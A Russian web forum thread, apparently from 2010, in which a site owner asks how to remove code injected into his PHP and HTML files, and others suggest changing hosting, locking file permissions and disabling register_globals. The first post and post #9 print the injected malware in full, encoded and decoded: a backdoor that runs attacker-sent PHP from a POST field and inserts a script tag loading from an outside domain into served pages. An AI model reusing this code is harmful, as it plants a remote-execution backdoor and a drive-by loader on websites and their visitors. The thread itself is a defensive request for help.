![]() |
![]() |
ВходЗдравствуйте, Гость ( Вход | Регистрация )
|
![]() ![]() |
![]() |
![]()
Сообщение
#1
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 273 Регистрация: 13.3.2008 Пользователь №: 2,710 Спасибо сказали: 43 Вставить ник ![]() |
Вообшем такая байда, у меня на постой на сайт добавляеца вредный код в такие файлы как "index.htm|html|php, default.* header.* footer.* config.*"
воозможно ли написать такой скрипт(на пхп) чтоб при отрытие этого файла удалялся вредный код с этих файлов, одни из вредных кодов (добавляеца в начало файла) КОД <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneHJvJykpe2Z1bmN0aW9uIHhybygkcyl7aWYocHJlZ19tYXRj aF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilp Z ihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO 1 w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9 IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9t Q 2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY 2 UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0 Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9u Z SNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlK C R2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZW N vZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyUmxibWx6Wlc0dVkyOXRMbU51TDJWa2FYUnZjaTl N U1VORlRsTkZMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScp K SRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvc y gkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24geHJvMigkYSwkYiwkYywkZCl7Z2xvYm F sJHhybzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHhybzEpKWNhbGxfdXNlcl9mdW5jKCR 4 cm8xLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25h b WUnXSk9PSd4cm8nKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdP W FycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2Nv bnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd4cm8nKTtmb3IoJGk9MDskaTxjb3VudCgk c yk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0keHJvbD0oKCRhPUBzZ X RfZXJyb3JfaGFuZGxlcigneHJvMicpKSE9J3hybzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1 B PU1RbJ2UnXSkpOw==')); ?> и бывает такое добавляется в конец файла КОД <script src=http://denisen.com.cn/editor/LICENSE.php ></script>
Сообщение отредактировал turbu: Mar 15 2010, 16:02 |
|
|
![]()
Сообщение
#2
|
|
Я уже люблю АС ![]() Группа: Пользователи Сообщений: 196 Регистрация: 5.8.2008 Пользователь №: 4,945 Спасибо сказали: 39 Вставить ник ![]() |
возможно. уже написан
|
|
|
![]()
Сообщение
#3
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 337 Регистрация: 16.12.2007 Из: хакляндия =) Пользователь №: 1,649 Спасибо сказали: 36 Вставить ник ![]() |
turbu, думаю стоит задуматься о новом хостинге. Это взлом со стороны сервера.
Встречался с подобной мутью, сначала пока не было возможности сменить хостера пришлось поставить на все файлы цмод 444. Потом просто забрал сайт с гамнахостинга. patriot, и где можно увидеть сие чудо? (IMG:http://antislaed.net/style_emoticons/default/rolleyes.gif) |
|
|
![]()
Сообщение
#4
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 273 Регистрация: 13.3.2008 Пользователь №: 2,710 Спасибо сказали: 43 Вставить ник ![]() |
XaXoL, да вот подумываю над этим)
patriot,хотелось бы тоже увидеть ) |
|
|
![]()
Сообщение
#5
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 462 Регистрация: 23.5.2008 Из: Aktobe Kazahstan Пользователь №: 3,888 Спасибо сказали: 51 Вставить ник ![]() |
XaXoL +1
Тоже встречался с такими хостерами. Но понял причину только после переезда на другой хостинг. |
|
|
![]()
Сообщение
#6
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 221 Регистрация: 1.11.2008 Пользователь №: 6,111 Спасибо сказали: 35 Вставить ник ![]() |
turbu а у тебя случайно Register globals не в режиме On?
|
|
|
![]()
Сообщение
#7
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 273 Регистрация: 13.3.2008 Пользователь №: 2,710 Спасибо сказали: 43 Вставить ник ![]() |
Mylenovez, on
|
|
|
![]()
Сообщение
#8
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 221 Регистрация: 1.11.2008 Пользователь №: 6,111 Спасибо сказали: 35 Вставить ник ![]() |
turbu, ставь off и никаких лишних кодов у тебя больше не появится - это всё из-за Register globals
|
|
|
![]()
Сообщение
#9
|
|
Юзверь ![]() Группа: Пользователи Сообщений: 39 Регистрация: 16.7.2007 Из: Москва Пользователь №: 332 Спасибо сказали: 5 Вставить ник ![]() |
выглядит это все примерно так =)))
КОД if(!function_exists('xro')){function xro($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RlbmlzZW4uY29tLmNuL2VkaXRvci9MSUNFTlNFLnBocCA+PC9z
Y3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function xro2($a,$b,$c,$d){global$xro1;$s=array();if(function_exists($xro1))call_user_func($xro1,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='xro')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('xro');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$xrol=(($a=@set_error_handler('xro2'))!='xro2')?$a:0;eval(base64_decode($_POST['e'])); |
|
|
![]()
Сообщение
#10
|
|
Я уже люблю АС ![]() Группа: Пользователи Сообщений: 196 Регистрация: 5.8.2008 Пользователь №: 4,945 Спасибо сказали: 39 Вставить ник ![]() |
XaXoL, turbu это маленький скриптик со следующими настройками:
КОД $deep = isset($_GET['levels']) ? intval($_GET['levels']) : 0; $mode = isset($_GET['work']) ? 'work' : 'preview'; //files filters $process_files = array('index.php', 'index.html'); //fragments to cut $search_array = array( '`<div style="visibility:hidden"><iframe.+</iframe></div>`isU' ); //ftp settings $ftp_data = array( 'server' => '', //ftp host 'username' => '', //ftp username 'password' => '', //ftp password 'path_from_ftproot' => ''); //path from ftp root |
|
|
![]() ![]() |
![]() |
Текстовая версия | Сейчас: 8 May 2025 - 13:04 |